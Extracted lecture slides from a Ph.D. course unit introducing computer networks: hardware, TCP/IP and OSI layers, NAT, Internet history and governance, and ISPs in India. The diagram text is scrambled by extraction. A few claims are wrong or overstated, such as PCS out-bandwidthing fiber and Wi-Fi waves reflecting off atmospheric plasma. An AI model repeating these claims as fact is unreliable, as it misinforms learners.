1

Ph.D. Course Work

UNIT-III
RCS 103
Computer Applications
Introduction to Computer Networks 2

INTRODUCTION TO COMPUTER
NETWORKS
 3

Networking: Computers on the Internet

• 1969 – 4
• 1971 – 15
• 1984 – 1000
• 1987 – 10,000
• 1989 – 100,000
• 1992 – 1,000,000
• 1996 – 10,000,000
• 2001 – 100,000,000
• By 2005… billions
 4
Typical LAN “Local Area Network”

Hub or
switch
 5

Client/Server Networks
• Client/Server network
 6

Network Hardware
• The most essential networking hardware devices
for us to learn about are:
– Cables
– NICs
– Hubs
– Switches
– Routers
 7

Wire Media
 8

Media Bandwidth

Now up to 1000Mbps = 1Gbps

 9

NIC – a “Network Interface Card”

• Every networked device must have a NIC
– Most laptops today have both a wired NIC and a wireless NIC
• Each NIC has an IP address (it’s “logical address”) and a physical
address called a MAC address.
– Each NIC is given an address at the factory that is the device’s physical
address or MAC address.
– No two NIC devices will ever have the same MAC address.
• MAC Addresses are used within a LAN
– IP addresses allow routers to route a message across different networks
– when a message reaches the correct destination network, the correct
NIC is identified via its MAC address.
 10

Hubs
• A “hub” is a networking component that into which you can
plug in multiple network devices
– Connect computers, printers, scanners, etc.
• Anytime a connected device sends a network message, the
hub forwards the message to all other connected devices (not
just the intended recipient!)
– Unintended recipients should ignore bogus network traffic (akin to
“screening” telephone calls)
– Creates opportunities for deviant “packet sniffers”
• Hub can only deal with one message at a time, since it is
broadcast over all connections
 11

Switches
• A switch is a network device which directs traffic only to its
intended destination(s) rather than to all devices on the
network.
– sometimes referred to as an “intelligent hub”

• Provide a dedicated connection between individual devices

– multiple devices can send data at once
 12

A Network Switch
Switch receives
data
and sends
Switch it back out

Switch sends
Station A signal out to a
Transmits single Port
to Station C

Station Station Station Station

A B C D
 13

Switches

• Consider packing sniffing software threat for people who

share a hub and have not activated network encryption
– Data sent “in the clear” means it has not been encrypted, and
therefore is vulnerable to eavesdropping via a hub
• As the prices for switches have dropped tremendously over
time, most companies have replaced hubs with switches
– Switch protects from eavesdropping by sending data on the LAN
only to the intended recipient
 14

Routers
Different networks connect via routers (not switches or hubs)
Routers even connect networks based on different protocols, which is important
since not all networks use the same protocol.

Network X
Switches

Routers
Network Z
Switches
 15

Gateway router
• When your computer needs to contact a computer
that is not within the immediate network (i.e., your
LAN), then your computer’s networking software is
configured to send the request to a particular router
called a:
– Default Gateway, or
– Gateway router
• For each of us, the most noteworthy role of the
gateway router is to connect your computer’s LAN to
your ISP’s larger network so that your computer
accesses the Internet
• Therefore, a gateway router is your computer’s
onramp to the Internet.
 16
Standard networking protocols
(communications standards)
• The committee that addresses LAN standards is called the
IEEE 802 Committee.
– Thus, IEEE LAN protocols always start with the number 802.
• “Ethernet” is a particular protocol published by this
committee as their “802.3” protocol.
– Ethernet (802.3) is the world’s #1 standard wired-LAN protocol
– There are other protocols besides Ethernet, but it is dominant
• Most PCs’ NICs support 10/100/1000 Mbps Ethernet.
 17

Packet switching
• The Ethernet (IEEE 802.3) standard transmits data in little
chunks called packets
• Break long messages into short “packets”
– Keeps one user from hogging a line
– Each packet is tagged with where it’s going
• Route each packet separately
– Each packet often takes a different route
– Packets often arrive out of order
– Receiver must reconstruct original message
 18

TCP/IP
• Transmission Control Protocol/Internet Protocol (TCP/IP)
provides the technical foundation for the public Internet as
well as for large numbers of private network. It is defined in
terms of layers.
• Do you use TCP/IP?
– If you are on the Internet, yes, you are using TCP/IP.
• TCP/IP layers (at left, with particular implementations at
right)
 19

A TCP/IP network packet

• Here is the basic structure of any one of trillions of
packets traversing the Internet at this moment

Packet

Trailer Data Field Header

IP Address IP Address
Sender Field Destination Field
 20

http://www.yougetsignal.com/tools/visual-tracert/
 21

Tying this back to Switches and Routers

• Routers operate between networks (at the

“internet” layer of TCP/IP) and use IP addresses to
direct network traffic

• Switches work within a single network (at the

“network interface” layer of TCP/IP) and use
hardware MAC addresses we discussed earlier
 22

Wireless networking
• Wireless fidelity (wi-fi) – a means of linking computers into a
wireless local area network (WLAN)
• Also referred to as 802.11
• Wi-Fi has evolved through various standards, the most
common of which have been:
– 802.11b, with 11 Mbps bandwidth

– 802.11g, with 54 Mbps bandwidth

– 802.11n, with 100 - 200 Mbps bandwidth
 23

Basic web networking scenario

ISP Internet ISP

Not secure. You and your BFF are exposed

and relying on your ISPs to provide all security
(from hacker attacks, viruses, worms).
•IP’s are public accessible.
You Your BFF
24.48.0.1 12.6.1.3
 24

Better: add router (a “firewall”)

ISP Internet ISP

24.48.0.1

Better. You buy a router that connects

to your ISP. The router assigns your
PC a private IP address.
You Your BFF
denotes wireless
192.168.0.1 12.6.1.3
connection to hub/router
 25

Recall Private IP addresses

• Is anyone here using this IP address at home?
– 192.168.0.1
• How can many people use the same IP address?
– “I thought each computer on the internet required a different IP
address?”
• Recall: the IT industry decided that the following ranges of IP
addresses would be non-routable (i.e., a router will not pass
along packets with such destinations to another network)
– 10.0.0.0 – 10.255.255.255
– 172.16.0.0 – 172.31.255.255
– 192.168.0.0 – 192.168.255.255
 26

Private IP address requires your router’s

NAT (Network Address Translation)

ISP Internet ISP

From
24.48.0.1 Your router’s NAT feature modifies your outgoing
packets such that their source IP becomes 24.48.0.1.
Your BFF’s chat program thus sends its response to
24.48.0.1
24.48.0.1. (Your router’s NAT function also changes
the destination IP on the response packets it later
From receives from your BFF to 192.168.0.1.
192.168.0.1
You Your BFF
192.168.0.1 12.6.1.3
 27

Hiding multiple servers behind one IP

address: Port Mapping
• Port mapping is what allows companies to have
multiple servers accessible via one IP and
corresponding DNS address
• Common example: company wish to run both an FTP
and Web server from its domain name, asite.com
– ftp://www.asite.com
• Note: this is equivalent to typing ftp://www.asite.com:21 because
port 21 is the default for ftp
• The firm’s router with Port Mapping will send port 21 traffic to the
FTP server
– http://www.asite.com
• Note: this is equivalent to typing http://www.asite.com:80
because port 80 is the default for http
• The firm’s router with Port Mapping will send port 80 traffic to the
web server
 Hiding multiple servers behind one 28

public IP address: Port Mapping

ISP Internet ISP

224.60.32.1:21
224.60.32.1:80
Need to direct incoming packets
to the appropriate server

Corporate Router
with Port Mapping 224.60.32.1
24.48.0.1 and NAT activated

224.60.32.1:21 224.60.32.1:80

FTP
server Web
You server

192.168.0.1 192.168.0.1:21 192.168.0.2:80

 29

What is a Comm. Network?

A communications network is a network of links
and nodes arranged so that messages may be
passed from one part of the network to another

• What are nodes and links?

– People and roads
– Telephones and switches
– Computers and routers
• What is a message? Networks are key for:
– Information
• Speed
• Distance
29
 Most operating systems have a default 30

browser. These may be faster and easier

to manage. Here are the top 20 internet
browsers listed below:
10. Vivaldi 20. Flock
09. Maxthon Browser 19. Netscape
08. Internet Explorer 18. Nightly
07. Internet Explorer 17. Konqueror browser
06. Opera 16. Torch Browser
05. Mozilla Firebird 15. Slim Browser
04. Mozilla Firefox 14. Brave
03. Safari Block 13. RockMelt
02. Safari 12. Epic Privacy Browser
01. Google Chrome 11.Falkon
 31

Most Popular Search Engines:

• Google
• Microsoft Bing
• Yahoo
• Baidu
• Yandex
• DuckDuckGo
• Ask.com
• Ecosia
• Aol.com
• Internet Archive
 32

Internet Service Providers in India

• Airtel India
• Amazon Networking Devices
• Beam Fiber
• Bharti Airtel
• Bharti Enterprises
• BSNL Broadband
 33

Internet Service Providers in India

• Cherrinet
• DEN Networks
• Idea Cellular
• Jio
• Madison Media Group
• Mahanagar Telephone Nigam
• MTS M-Blaze
• Reliance Communications
 34

Internet Service Providers in India

• Sancharnet
• Siti Cable
• Spectranet
• Spice Telecom
• Tata Communications
• Tata Teleservices
• Tikona Digital Networks
• Uninor
• Videocon
• Vodafone India
• You Broadband
 35

Networks are Old

• 2400 BC: courier networks in Egypt
• 550 BC: postal service invented in Persia

Problems:
• Speed
• Reliability
• Security

36
 36

Submarine Cables + The Telegraph

• 1850 – first submarine cables laid
• …by 1900 the first global communications
network!

Submarine cables 1895

 37

Towards Electric Communication

• 1837: Telegraph invented by Samuel Morse
– Distance: 10 miles
– Speed: 10 words per minute Higher compression =
– In use until 1985! faster speeds
• Key challenge: how to encode information?
– Originally used unary encoding
A• B •• C ••• D •••• E •••••
– Next generation: binary encoding
A •– B –••• C –•–• D –•• E •

38
 38

Growth of the Telephone Network

• 1881: Twisted pair for local loops
• 1885: AT&T formed
• 1892: Automatic telephone switches
• 1903: 3 million telephones in the US
• 1915: First transcontinental cable
• 1927: First transatlantic cable
• 1937: first round-the-world call
• 1946: National numbering plan
39
 39

Crazy idea: Packet switching

• Telephone networks are circuit switched
– Each call reserves resources end-to-end
– Provides excellent quality of service
• Problems
– Resource intense (what if the circuit is idle?)
– Complex network components (per circuit state,
security)
• Packet switching
– No connection state, network is store-and-forward
– Minimal network assumptions
– Statistical multiplexing gives high overall utilization
40
 40

History of the Internet

• 1961: Kleinrock @ MIT: packet-switched network
• 1962: Licklider’s vision of Galactic Network
• 1965: Roberts connects computers over phone line
• 1967: Roberts publishes vision of ARPANET
• 1969: BBN installs first
InterfaceMsgProcessor at UCLA
• 1970: Network Control Program (NCP)
• 1972: Public demonstration of ARPANET
• 1972: Kahn @ DARPA advocates
Open Architecture
• 1972: Vint Cerf @ Stanford writes TCP

41
 41

The 1960s

43
 42

1971

44
 43

1973

Satellite Link to Hawaii

First international connection
(London + Norway)

45
 44

Growing Pains
• Problem: early networks used incompatible
protocols

46
 45

Kahn’s Ground Rules

1.Each network is independent, cannot be forced to change
– A network of networks
– Each running their own set of protocols
2.Best-effort communication (i.e. no guarantees)
3.Boxes (routers/gateways) connect networks
– Boxes that do not maintain state  keep them simple!
4.No global control

• Principles behind the development of IP

• Led to the Internet as we know it
• Internet is still structured as independent networks
47
 46

The Birth of Routing

Trivia
• Kahn believed that there would
only be ~20 networks.
• He was way off.
• Why?

48
 47

2000
49
 48

2006
50
 49

2009
51
 50

More Internet History

• 1974: Cerf and Kahn paper on TCP (IP kept separate)
• 1980: TCP/IP adopted as defense standard
• 1983: ARPANET and MILNET split
• 1983: Global NCP to TCP/IP flag day
• 198x: Internet melts down due to congestion
• 1986: Van Jacobson saves the Internet (BSD TCP)
• 1987: NSFNET merges with other networks
• 1988: Deering and Cheriton propose multicast
• 1994: NSF backbone dismantled, private backbone
• 1999-present: The Internet boom and bust … and boom
• 2007: Release of iPhone, rise of Mobile Internet

52
 51

Internet Applications Over Time

• 1972: Email
• 1973: Telnet – remote access to computing
• 1982: DNS – “phonebook” of the Internet
• 1985: FTP – remote file access
• 1989: NFS – remote file systems
• 1991: The World Wide Web (WWW) goes public
• 1995: SSH – secure remote shell access
• 1995-1997: Instant messaging (ICQ, AIM)
• 1998: Google
• 1999: Napster, birth of P2P
• 2001: Bittorrent
• 2004: Facebook
• 2005: YouTube
• 2007: The iPhone What is next?

53
 52

Takeaways
• Communication is fundamental to human nature
• Key concepts have existed for a long time
– Speed/bandwidth
 Encoding
– Latency
– Switching  Cable
management
–  Multiplexing
Packets vs. circuits
• The Internet has changedthe world
Routing
– Promise of free ($) and free (freedom) communication
– Shrunk the world
• What made the Internet so successful? Stay tuned!

54
Introduction to Computer Networks 53

Computer Networks
Computer network connects
two or more autonomous
computers.

The computers can be

geographically located
anywhere.
Introduction to Computer Networks 54

LAN, MAN & WAN

Network in small geographical Area (Room, Building or a
Campus) is called LAN (Local Area Network)

Network in a City is call MAN (Metropolitan Area Network)

Network spread geographically (Country or across Globe) is

called WAN (Wide Area Network)
Introduction to Computer Networks 55

Applications of Networks
Resource Sharing
Hardware (computing resources, disks, printers)
Software (application software)
Information Sharing
Easy accessibility from anywhere (files, databases)
Search Capability (WWW)
Communication
Email
Message broadcast
Remote computing
Distributed processing (GRID Computing)
Introduction to Computer Networks 56

Network Topology
The network topology
defines the way in which
computers, printers, and
other devices are
connected. A network
topology describes the
layout of the wire and
devices as well as the
paths used by data
transmissions.
Introduction to Computer Networks 57

Bus Topology
Commonly referred to as a
linear bus, all the devices
on a bus topology are
connected by one single
cable.
Introduction to Computer Networks 58

Star & Tree Topology

The star topology is the most
commonly used architecture in
Ethernet LANs.
When installed, the star topology
resembles spokes in a bicycle
wheel.
Larger networks use the extended
star topology also called tree
topology. When used with network
devices that filter frames or packets,
like bridges, switches, and routers,
this topology significantly reduces
the traffic on the wires by sending
packets only to the wires of the
destination host.
Introduction to Computer Networks 59

Ring Topology
A frame travels around the ring,
stopping at each node. If a node wants
to transmit data, it adds the data as
well as the destination address to the
frame.
The frame then continues around the
ring until it finds the destination node,
which takes the data out of the frame.
Single ring – All the devices on the
network share a single cable
Dual ring – The dual ring topology
allows data to be sent in both
directions.
Introduction to Computer Networks 60

Mesh Topology
The mesh topology
connects all devices
(nodes) to each other for
redundancy and fault
tolerance.
It is used in WANs to
interconnect LANs and for
mission critical networks
like those used by banks
and financial institutions.
Implementing the mesh
topology is expensive and
difficult.
Introduction to Computer Networks 61

Network Components
Physical Media
Interconnecting Devices
Computers
Networking Software
Applications
Introduction to Computer Networks 62

Networking Media
Networking media can be
defined simply as the
means by which signals
(data) are sent from one
computer to another
(either by cable or wireless
means).
Introduction to Computer Networks 63

Networking Devices
HUB, Switches, Routers,
Wireless Access Points,
Modems etc.
Introduction to Computer Networks 64

Computers: Clients and Servers

In a client/server network
arrangement, network
services are located in a
dedicated computer whose
only function is to respond
to the requests of clients.

The server contains the

file, print, application,
security, and other services
in a central computer that
is continuously available to
respond to client requests.
Introduction to Computer Networks 65

Networking Protocol: TCP/IP

Introduction to Computer Networks 66

Applications
E-mail
Searchable Data (Web Sites)
E-Commerce
News Groups
Internet Telephony (VoIP)
Video Conferencing
Chat Groups
Instant Messengers
Internet Radio
OSI Model 67

OSI MODEL
OSI Model
68

Communication Architecture
Strategy for connecting host computers and other
communicating equipment.
Defines necessary elements for data communication
between devices.
A communication architecture, therefore, defines a
standard for the communicating hosts.
A programmer formats data in a manner defined by the
communication architecture and passes it on to the
communication software.
Separating communication functions adds flexibility, for
example, we do not need to modify the entire host software
to include more communication devices.
OSI Model
69

Layer Architecture
Layer architecture simplifies the network design.
It is easy to debug network applications in a layered
architecture network.
The network management is easier due to the layered
architecture.
Network layers follow a set of rules, called protocol.
The protocol defines the format of the data being
exchanged, and the control and timing for the handshake
between layers.
OSI Model
70

Open Systems Interconnection (OSI) Model

International standard organization (ISO) established a

committee in 1977 to develop an architecture for computer
communication.
Open Systems Interconnection (OSI) reference model is the
result of this effort.
In 1984, the Open Systems Interconnection (OSI) reference
model was approved as an international standard for
communications architecture.
Term “open” denotes the ability to connect any two
systems which conform to the reference model and
associated standards.
OSI Model
71

OSI Reference Model

The OSI model is now considered the primary Architectural
model for inter-computer communications.
The OSI model describes how information or data makes its
way from application programmes (such as spreadsheets)
through a network medium (such as wire) to another
application programme located on another network.
The OSI reference model divides the problem of moving
information between computers over a network medium
into SEVEN smaller and more manageable problems .
This separation into smaller more manageable functions is
known as layering.
OSI Model
72

OSI Reference Model: 7 Layers

OSI Model
73

OSI: A Layered Network Model

The process of breaking up the functions or tasks of networking
into layers reduces complexity.
Each layer provides a service to the layer above it in the protocol
specification.
Each layer communicates with the same layer’s software or
hardware on other computers.
The lower 4 layers (transport, network, data link and physical —
Layers 4, 3, 2, and 1) are concerned with the flow of data from end
to end through the network.
The upper four layers of the OSI model (application, presentation
and session—Layers 7, 6 and 5) are orientated more toward
services to the applications.
Data is Encapsulated with the necessary protocol information as it
moves down the layers before network transit.
OSI Model
74

Physical Layer
Provides physical interface for transmission of information.

Defines rules by which bits are passed from one system to

another on a physical communication medium.
Covers all - mechanical, electrical, functional and procedural
- aspects for physical communication.
Such characteristics as voltage levels, timing of voltage
changes, physical data rates, maximum transmission
distances, physical connectors, and other similar attributes
are defined by physical layer specifications.
OSI Model
75

Data Link Layer

Data link layer attempts to provide reliable communication
over the physical layer interface.

Breaks the outgoing data into frames and reassemble the

received frames.
Create and detect frame boundaries.
Handle errors by implementing an acknowledgement and
retransmission scheme.
Implement flow control.
Supports points-to-point as well as broadcast
communication.
Supports simplex, half-duplex or full-duplex communication.
OSI Model
76

Network Layer
Implements routing of frames (packets) through the
network.

Defines the most optimum path the packet should take from
the source to the destination
Defines logical addressing so that any endpoint can be
identified.
Handles congestion in the network.
Facilitates interconnection between heterogeneous
networks (Internetworking).
The network layer also defines how to fragment a packet
into smaller packets to accommodate different media.
OSI Model
77

Transport Layer
Purpose of this layer is to provide a reliable mechanism for
the exchange of data between two processes in different
computers.

Ensures that the data units are delivered error free.

Ensures that data units are delivered in sequence.
Ensures that there is no loss or duplication of data units.
Provides connectionless or connection oriented service.
Provides for the connection management.
Multiplex multiple connection over a single channel.
OSI Model
78

Session Layer
Session layer provides mechanism for controlling the dialogue
between the two end systems. It defines how to start, control and
end conversations (called sessions) between applications.
This layer requests for a logical connection to be established on
an end-user’s request.
Any necessary log-on or password validation is also handled by
this layer.
Session layer is also responsible for terminating the connection.
This layer provides services like dialogue discipline which can be
full duplex or half duplex.
Session layer can also provide check-pointing mechanism such
that if a failure of some sort occurs between checkpoints, all data
can be retransmitted from the last checkpoint.
OSI Model
79

Presentation Layer
Presentation layer defines the format in which the data is to
be exchanged between the two communicating entities.
Also handles data compression and data encryption
(cryptography).
OSI Model
80

Application Layer
Application layer interacts with application programs and is
the highest level of OSI model.
Application layer contains management functions to
support distributed applications.
Examples of application layer are applications such as file
transfer, electronic mail, remote login etc.
OSI Model
81

OSI in Action
A message begins at the top application
layer and moves down the OSI layers to
the bottom physical layer.
As the message descends, each
successive OSI model layer adds a
header to it.
A header is layer-specific information
that basically explains what functions
the layer carried out.
Conversely, at the receiving end,
headers are striped from the message
as it travels up the corresponding
layers.
TCP/IP Model
82

TCP/IP MODEL
TCP/IP Model
83

OSI & TCP/IP Models

TCP/IP Model
84

TCP/IP Model
Application Layer
Application programs using the network
Transport Layer (TCP/UDP)
Management of end-to-end message transmission,
error detection and error correction
Network Layer (IP)
Handling of datagrams : routing and congestion
Data Link Layer
Management of cost effective and reliable data delivery,
access to physical networks
Physical Layer
Physical Media
 85

The Internet

Introductory material.
An overview lecture that covers Internet related topics, including a
definition of the Internet, an overview of its history and growth, and
standardization and naming.
 86

A Definition
• On October 24, 1995, the FNC unanimously passed a
resolution defining the term Internet.

RESOLUTION: The Federal Networking Council (FNC) agrees that the

following language reflects our definition of the term "Internet".
"Internet" refers to the global information system that --
(i) is logically linked together by a globally unique address space
based on the Internet Protocol (IP) or its subsequent
extensions/follow-ons;
(ii) is able to support communications using the Transmission
Control Protocol/Internet Protocol (TCP/IP) suite or its subsequent
extensions/follow-ons, and/or other IP-compatible protocols; and
(iii) provides, uses or makes accessible, either publicly or privately,
high level services layered on the communications and related
infrastructure described herein.
88
 87

History of the Internet

Mid 1960: Papers on “Packet Switching” emerge.
End 1969s: ARPA sponsors the development of a packet-switching
network, called the ARPANET. First four nodes are
UCLA, SRI, U. Utah, UCSB.
1974: The TCP/IP protocols and model are being proposed by
Cerf/Kahn.
1983: ARPANET adopts TCP/IP. At this time, the ARPANET has
200 routers.
1984: NSF funds a TCP/IP based backbone network. This
backbone grows into the NSFNET, which becomes the
successor of the ARPANET.
1995: NSF stops funding of NSFNET. The Internet is
completely commercial.

89
 88

Applications of the Internet

• Traditional core applications:
Email
News
Remote Login
File Transfer
• The killer application:
World-Wide Web (WWW)
• Future applications:
Videoconferencing and Telephony
Multimedia Services
Internet Broadcast

90
 89

Time Line of the Internet

Source: Internet Society

91
 90

Growth of the Internet

1000000000
Number of Hosts on the Internet

100000000

10000000

1000000

100000

10000

1000

100
Aug-81

Aug-83

Aug-85

Aug-87

Aug-89

Aug-91

Aug-93

Aug-95

Aug-97

Aug-99

Aug-01
Source: Internet Software Consortium

92
 91

Internet Infrastructure

Backbone Network Regional

Network
Regional
Network

IXP
local ISP IXP
Backbone Network

Regional IXP Regional

local ISP Network
Network

corporate campus
local ISP
network network

93
 92

Telecommunications
&
The Internet
 93

Basic Telecom Model

Computer Computer

Channel Communication Channel

interface Channel interface
 94

Typical Home Telecom Model

Computer Computer

Digital Digital
signals signals

Modem Modem
Audio Phone Lines

Analog signals
 95

Channels
• Twisted wire (twisted pair)
• Coaxial Cable
• Fiber Optics
• Microwave
• Newer Wireless
 96

Twisted Pair
• Low cost
• easy to work with
• installed infrastructure
• crosstalk
• 300bps to 100Mbps
• “This modem is 56Kbps capable. However, current
regulations limit download speeds to 53Kbps,” the fine print
from a typical modem advertisement.
 97

DSL
• Uses existing twisted pair
• 256Kbps to 40Mbps
• Loop length max about 18,000 ft.
• More correctly ADSL (Asymmetric Digital
Subscriber Line) with download speeds
different from upload speeds.
 98

Coaxial Cable
• More expensive
• harder to work with
• not as extensive an existing infrastructure
– cable TV companies are changing this
• 56Kbps to 550Mbps
 99

Fiber Optics
• Very expensive
• difficult to work with
• existing infrastructure limit to backbones
• 500Kbps to 30Gbps
 100

Microwave
• Not as expensive as land lines
• Limited to line of site, (towers)
– reasonable infrastructure
• Satellite bounce, increases expense
– geo-synchronous (22,000 miles)
– low earth orbit (cheaper, lower power)
• 256Kbps to 100Mbps
 101

Newer Wireless
– Cellular
– mobile data networks
– personal communications services (PCS)

– note: pagers & PDAs are not channels, they would

be nodes on one end of a channel
 102

Transmission Speed
• BPS, bits-per-second, the amount of
information that can be transmitted through a
channel
• BAUD - a binary event, a signal change from
positive to negative or vice versa.
 103

Speed II
• At higher speeds a single signal change can
transmit more than one bit at a time, so the
bit rate will generally be higher that the baud
rate.
• Transmission capacity is a function of the
frequency, higher frequency means higher
capacity
 104

More Speed
• Bandwidth = range of frequencies that a
channel can support (difference between
highest and lowest frequency).
• Greater range means greater bandwidth.
• Greater bandwidth means greater
transmission capacity.
 105

Faster Yet
• Bandwidth is like pipe diameter.
• Larger diameter pipes can transmit more
water in a given period of time.
• Personal Communication Services, PCSs, have
a greater bandwidth than fiber optics.
 106

Communications Processors T

Computer
T
Front End Concentrator
Controller Processor Channel
T
C
h T
CPU a
n
n
e
l

Multiplexer

PC PC PC
 107

Network Topology
C

• Star Network C C P

• Bus Network C C C P

C P

• Ring Network C C

C C
 108

Networks
• Local Area Network, LAN
• Wide Area Network, WAN
• Value Added Network, VAN
 109

Network Terms
• File server
• Print server
• Gateway - connects dissimilar networks
• Bridge - connects similar networks
• Routers - connects networks & directs traffic
• Similar networks = same network protocols
 110

Transmission on LANs
• Token Ring
– can talk only when you have the token
– cost more than Ethernet
– better for high volume traffic
• Ethernet
– talk whenever you want
– send again if collision
– works best with low volume traffic

Chapter 8 20
 111

Transmission on WANs & VANs

• Packet Switching
– message broken into packets
– packets may take various routes
– message reassembled at destination
– allows load balancing on channels
• Frame Relay
– like packet switching, no error correction
 112

Internet Capabilities

• Communications • Information Retrieval

– E-mail – Gopher
– Archie
– Usenet – WAIS
– Chatting – FTP
– Telnet
 113

World Wide Web

• Set of standards for storing, retrieving,
formatting, and displaying information using a
client/server architecture
• Hypertext markup Language (HTML)
• browser
• search engines
 114

Putting It All Together

AT&T Level 3

Centurylink

I29 Cable One

Consumer Consumer Consumer

 115

Some Upper Tier Providers

• AT&T • IBM
• Bell Atlantic • MCI
• Bell South • Pacific Bell
• Cable and Wireless • QUEST
• Cable One • Sprint
• GTE • US West
 116

Tier 1 Networks
• The largest backbones on the Internet:
• Centurylink, Telecom Italia, Verizon, Sprint,
TeliaSonera International, NTT Communications,
Deutsche Telekom, Level 3, AT&T
• These top branded backbones only trade peering
traffic among themselves.
 117

Common Bandwidths
• 56K modem 0.056 Mbps
• ADSL 40 Mbps
• Cable Modem 50 Mbps
• T1 1.5 Mbps
• Ethernet 10 to 1,000 Mbps
• T3 44.7 Mbps
• See http://bandwidthplace.com/
 118

Upper Tier Bandwidths

OC-x mulitples of 51.85 Mbps

• OC-3 155 Mbps

• OC-12 622 Mbps
• OC-48 2,488 Mbps
• OC-96 4,977 Mbps
• OC-192 9,953 Mbps
• OC-768 39,812 Mbps
 119

Organization Benefits of Internet

• Reducing Communication Costs

– virtual private net
• Enhancing Communication and Coordination
• Accelerating the Distribution of Knowledge
• Facilitating Electronic Commerce
 120

Intranets
• An internal network based on World Wide
Web technology
• Firewall
– security software to prevent unauthorized
access to an intranet
• Firebreak
– a physical break between the Internet and
Intranet
 121

IP Addresses
• An identifier for a computer or device on a
TCP/IP network. Networks using the TCP/IP
protocol route messages based on the IP
address of the destination. The format of an IP
address is a 32-bit numeric address written as
four numbers separated by periods. Each
number can be zero to 255. For example,
1.160.10.240 could be an IP address.
 122

IP Address Registries

• Regional Internet Registries:

• American Registry for Internet Numbers, ARIN
• Réseaux IP Européens Network Coordination Centre,
RIPE NCC
• Asia Pacific Network Information Centre, APNIC
• Latin American and Caribbean Internet Addresses
Registry, LACNIC
 Internet Infrastructure 123

• The infrastructure of the Internet consists of a

federation of connected networks that are each
independently managed (“autonomous system”)
– Note: Each “autononmous system may consist of
multiple IP networks

• Hierarchy of network service providers (NSPs_

– Tier-1: nation or worldwide network (US: less than 20)
– Tier-2: regional networks (in US: less than 100)
– Tier-3: local Internet service provider (in US: several
thousand)

125
 124

Internet Infrastructure
• Location where a network (ISP, corporate
network, or regional network) gets access to the
Internet is called a Point-of-Presence (POP).
• Locations (Tier-1 or Tier-2) networks are
connected for the purpose of exchanging traffic
are called peering points.
– Public peering: Traffic is swapped in a specific
location, called Internet exchange points (IXPs)
– Private peering: Two networks establish a direct link
to each other.

126
 125

Topology of a Tier-1 NSP

127
 126
Organization of a single node in a Tier-1 network

Peering points

Leased links

....
to customers
3Com

Bay Networks

3Com

Leased links

....
SD

Links to other Modem Bank Modem Bank

to customers
nodes of the
network
Bay Networks
SD

3Com

Modem Bank Modem Bank

Leased links

....
to customers

3Com

Metropolitan

....
area networks
Dial-up and
leased links
....

Modem Bank

to customers

128
 127

Who is Who on the Internet ?

• Internet Society (ISOC): Founded in 1992, an international nonprofit professional
organization that provides administrative support for the Internet. Founded in
1992, ISOC is the organizational home for the standardization bodies of the
Internet.
• Internet Engineering Task Force (IETF): Forum that coordinates the development
of new protocols and standards. Organized into working groups that are each
devoted to a specific topic or protocol. Working groups document their work in
reports, called Request For Comments (RFCs).
• IRTF (Internet Research Task Force): The Internet Research Task Force is a
composed of a number of focused, long-term and small Research Groups.
• Internet Architecture Board (IAB): a technical advisory group of the Internet
Society, provides oversight of the architecture for the protocols and the
standardization process
• The Internet Engineering Steering Group (IESG): The IESG is responsible for
technical management of IETF activities and the Internet standards process.
Standards. Composed of the Area Directors of the IETF working groups.

129
 128

Internet Standardization Process

• Working groups present their work i of the Internet are published as RFC
(Request for Comments).

• RFCs are the basis for Internet standards.

• Not all RFCs become Internet Standards ! (There are >3000 RFCs and less
than 70 Internet standards

• A typical (but not only) way of standardization is:

– Internet Drafts
– RFC
– Proposed Standard
– Draft Standard (requires 2 working implementation)
– Internet Standard (declared by IAB)

130
 129
Assigning Identifiers for the Internet

• Who gives University the domain name “tcpip-lab.edu” and who

assigns it the network prefix “128.143.0.0/16”? Who assigns port
80 as the default port for web servers?

• The functions associated with the assignment of numbers is referred to as

Internet Assigned Number Authority (IANA).
• Early days of the Internet: IANA functions are administered by \a single person
(Jon Postel).
Today:
• Internet Corporation for Assigned Names and Numbers (ICANN) assumes the
responsibility for the assignment of technical protocol parameters, allocation
of the IP address space, management of the domain name system, and
others.
• Management of IP address done by Regional Internet Registries (RIRs):
– APNIC (Asia Pacific Network Information Centre)
– RIPE NCC (Réseaux IP Européens Network Coordination Centre)
– ARIN (American Registry for Internet Numbers)
Domain names are administered by a large number of private organizations that
are accredited by ICANN.

131
 130

Review
 131

What is the Internet?

The Internet is a global web of
computers connected to each other by
wires, (mostly phone lines). If you look
at a map of big cities, smaller towns,
and scattered houses, each is connected
together with roads, railways, etc.. This
is similar to the Internet, except with
the Internet, wires connect computers.
The Internet is a superhighway.
132
 133

Some ways to use the Internet

• E-mail
• Research
• Shopping
• News
• Games
• Ed-line
 134

Do you ever use the Internet?

 135

How often do you use the Internet?

 136

Why do you generally use the

Internet?
 137

Internet Terms
• WWW
• Browser
• Search Engine
• URL
• Domain
• html
 138

WWW
• The World Wide Web
 139

Browser
• Software program that allows a person
to view WWW documents. Examples of
browsers are Netscape, Microsoft
Internet Explorer, Mosaic, Mac web,
and Net cruiser.
 140

Let’s Look at some examples of

some browsers.
 141

Search Engine
• A web site that will help you search the
Internet for key words, subjects, etc.
 142

Let’s try a search now!

 143

URL
• UNIFORM RESOURCE LOCATOR- The
unique address of any web page. It tells
your computer where the information is
stored so it can be viewed.
 144

Now we are going to look at a URL

 145

Domain
• A way to indicate what type of site you may
be viewing. In the U.S. some common domains
are .com-commercial, .org- non-profit and
research organizations, .gov- government
agency, .edu-education. More are constantly
being added so theses should only be used as
guidelines to help you know what type of site
you are on.
 146

Internet Connection
• Logistic (ICT Manager) will ensure internet services those are using ACF
email service and computer.
• Missions standard is using Local Area Networks connection through
network cable and wireless access points (Wifi).
• Local Area Networks provides internet access to computers and other
devices in a limited area. This connection established by wire or wireless.

• WAN –Wide Area Network

– Public Internet- When you go outside the Local Area Network through
Internet Service Provider (ISP)

2016 148
 147

INTERNET

Cable or DSL or
Vsat or BLR
modem
Router WAN

LAN
Switch

Wireless Access
point
August 19, 2021 149
 148

LAN problems
Wi-Fi (Wireless Fidelity)

 Uses radio frequency technology

 No physical wired connection between sender and receiver

Wi-Fi produce electromagnetic waves to surroundings. When electromagnetic waves are

reflected by the Earth’s upper atmosphere where it becomes a plasma at high altitude.

Problem with Wi-Fi

 Coverage of area
 Interference from nearby wireless devices
 Overlapping with others signal
 Frequency obstacle
 Congestion of data flows

2016 150
 149

LAN Problems
• Wi-Fi or LAN is not connected.
• Wireless might have disabled
• Cable disconnected if you are using patch cord for network
connectivity
• Difference when using cable and Wi-Fi

• Wi-Fi

• Cable
2016 151
